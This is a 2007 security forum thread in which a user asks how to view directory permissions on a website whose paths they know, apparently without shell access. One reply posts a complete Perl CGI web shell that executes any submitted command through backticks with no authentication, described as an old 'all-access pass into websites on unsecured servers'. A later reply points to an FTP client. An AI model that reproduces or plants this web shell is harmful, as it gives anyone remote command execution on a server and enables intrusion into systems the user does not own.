-
December 24th, 2007, 09:16 PM
#1
Junior Member
how to check up directory chmods?
how to check up directory chmods (i dont know how it is called on english - directory access properties) if i know full way to derictory in system
-
December 24th, 2007, 09:57 PM
#2
Junior Member
-
December 24th, 2007, 10:16 PM
#3
Junior Member
i have no access to command prompt. there is website and i know way to some derictories (like http://xxx.com/images, etc...) and also know way in the system (/home/www/....). is it possible to see directory chmods?
-
December 24th, 2007, 11:51 PM
#4
If the server belongs to you and you can upload files then yeah. If the server doesn't belong to you and you're just directory browsing it then no. If the former is the case, then you can just upload a file manager (assuming your host doesn't have one for you to use, otherwise you should see it). Or, you can try the script im gonna paste below. It's an old script I had lying around, back from my WebTV days, lol. This one isn't mine, and I don't know who wrote it, but it's a web based command prompt and the commands you throw at it should be tailored to your host's OS. Keep in mind it's very unsecure so if you use it then you should remove it when you're done.
Any oldschool WebTV'ers might remember this script as the all-access pass into websites on unsecured servers like HyperMart. They eventually caught on and started locking things down, lol...
Code:
#!/usr/bin/perl
use POSIX;
&parse_form;
$action = $input{'action'};
$command = $input{'command'};
$CWD = $input{'cwd'};
if ($action eq "") { &start; }
if ($action ne "") { &run_command; }
sub start {
⊤
open(MSG,"cat /etc/motd |");
@lines = <MSG>;
close(MSG);
$whereami = POSIX::getcwd();
$PROMPT = "Telnet\@$ENV{'SERVER_NAME'}:$whereami";
print "<PRE>\n";
for $x(0 .. $#lines) {
print "$lines[$x]\n";
}
print "$PROMPT <blink>_</blink>\n\n</PRE>\n";
⊥
}
sub top {
print "Content-type: text/html\n\n";
print "<BODY BGCOLOR=\"000000\" TEXT=\"white\" onLoad=\"document.cmd_form.command.focus()\">\n"; } sub bottom { print "<FORM NAME=\"cmd_form\" METHOD=POST>
<input type=hidden name=\"action\" value=\"run\">
<INPUT TYPE=\"HIDDEN\" NAME=\"cwd\" VALUE=\"$whereami\">
<INPUT TYPE=\"TEXT\" NAME=\"command\" SIZE=60 MAXLENGTH=1000 bgcolor=000000 text=white cursor=gold border=0 nohighlight autoactivate>"; } sub run_command { ⊤
## First, get into the correct directory
chdir ($CWD);
if ( $command =~ 'cd') {
@ls = split / /, $command;
$dir = $ls[1];
$dir =~ s/\n//g;
$dir =~ s/\cM//g;
chdir ($dir);
}
$whereami = POSIX::getcwd();
$PROMPT = "Telnet\@$ENV{'SERVER_NAME'}:$whereami";
$_=$command;
s/(.)*=//; s/\+/ /g; s/%(..)/pack("c",hex($1))/ge;
$out=`$_ 2>&1`;
print "<PRE> $PROMPT \n > $command \n\n $out \n\n $PROMPT <blink>_</blink></PRE>"; ⊥ exit 0;
}
sub parse_form{
read(STDIN, $buffer, $ENV{'CONTENT_LENGTH'});
if (length($buffer) < 5) {
$buffer = $ENV{QUERY_STRING};
}
@pairs=split(/&/,$buffer);
foreach $pair(@pairs) {
($name, $value)=split(/=/,$pair);
$value =~ tr/+/ /;
$value =~ s/%([a-fA-F0-9][A-F0-9])/pack("C",hex($1))/eg;
if($input{$name} eq "") {
$input{$name} = $value;
push (@Fields,$name);
}
else {
$input{$name} = $input{$name}." ".$value;
}
}
}
-
December 25th, 2007, 12:18 PM
#5
Originally Posted by je0n
i have no access to command prompt. there is website and i know way to some derictories (like http://xxx.com/images, etc...) and also know way in the system (/home/www/....). is it possible to see directory chmods?
Use the ftp client you use to upload the content. A proper client will show you the directory/file permissions.
Oliver's Law:
Experience is something you don't get until just after you need it.
Similar Threads
-
By Nightfalls_Girl in forum Microsoft Security Discussions
Replies: 0
Last Post: July 25th, 2003, 12:14 AM
-
By zerocol666 in forum Miscellaneous Security Discussions
Replies: 9
Last Post: April 26th, 2003, 03:29 PM
-
By nakoka in forum Security Archives
Replies: 20
Last Post: December 20th, 2001, 10:32 AM
-
By MrLinus in forum Other Tutorials Forum
Replies: 7
Last Post: December 13th, 2001, 05:36 AM
-
By Badassatchu in forum Non-Security Archives
Replies: 1
Last Post: November 23rd, 2001, 11:13 PM
Posting Permissions
- You may not post new threads
- You may not post replies
- You may not post attachments
- You may not edit your posts
-
Forum Rules
|
|